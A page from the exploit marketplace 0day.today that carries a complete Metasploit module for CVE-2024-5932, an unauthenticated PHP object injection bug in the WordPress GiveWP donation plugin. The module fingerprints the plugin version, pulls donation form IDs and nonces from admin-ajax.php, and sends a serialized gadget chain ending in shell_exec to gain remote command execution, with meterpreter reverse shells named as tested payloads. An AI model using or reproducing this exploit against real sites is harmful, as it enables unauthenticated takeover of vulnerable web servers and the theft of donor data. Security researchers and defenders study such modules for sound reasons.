0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution Exploit
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'GiveWP Unauthenticated Donation Process Exploit', 'Description' => %q{ The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Villu Orav', # Initial Discovery 'EQSTSeminar', # Proof of Concept 'Julien Ahrens', # Vulnerability Analysis 'Valentin Lobstein' # Metasploit Module ], 'References' => [ ['CVE', '2024-5932'], ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'], ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'], ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin'] ], 'DisclosureDate' => '2024-08-25', 'Platform' => %w[unix linux win], 'Arch' => [ARCH_CMD], 'Privileged' => false, 'Targets' => [ [ 'Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD # tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def check return CheckCode::Unknown unless wordpress_and_online? print_status("WordPress Version: #{wordpress_version}") if wordpress_version check_code = check_plugin_version_from_readme('give', '3.14.2') return CheckCode::Safe unless check_code.code == 'appears' print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}") CheckCode::Appears end def exploit forms = fetch_form_list fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty? selected_form = forms.sample valid_form = retrieve_and_analyze_form(selected_form['id']) return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.") send_exploit_request( valid_form['give_form_id'], valid_form['give_form_hash'], valid_form['give_price_id'], valid_form['give_amount'] ) end def fetch_form_list res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'data' => 'action=give_form_search' ) return print_error('Failed to retrieve form list.') unless res&.code == 200 forms = JSON.parse(res.body) form_ids = forms.map { |form| form['id'] }.sort print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}") forms end def retrieve_and_analyze_form(form_id) form_res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id } ) return unless form_res&.code == 200 form_data = JSON.parse(form_res.body) give_form_id = form_id give_form_hash = form_data['data'] give_price_id = '0' give_amount = '$10.00' # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work. return unless give_form_hash { 'give_form_id' => give_form_id, 'give_form_hash' => give_form_hash, 'give_price_id' => give_price_id, 'give_amount' => give_amount } end def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount) final_payload = format( 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \ 'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \ 's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \ 'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \ 's:10:"shell_exec";s:12:"\\0*\\0generator";' \ 'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \ 's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \ 's:13:"\\0*\\0maxRetries";i:10;}}}}}}', length: payload.encoded.length, encoded: payload.encoded ) data = { 'give-form-id' => give_form_id, 'give-form-hash' => give_form_hash, 'give-price-id' => give_price_id, 'give-amount' => give_amount, 'give_first' => Faker::Name.first_name, 'give_last' => Faker::Name.last_name, 'give_email' => Faker::Internet.email, 'give_title' => final_payload, 'give-gateway' => 'offline', 'action' => 'give_process_donation' } send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'data' => URI.encode_www_form(data) }, 0) end end # 0day.today [2024-09-19] #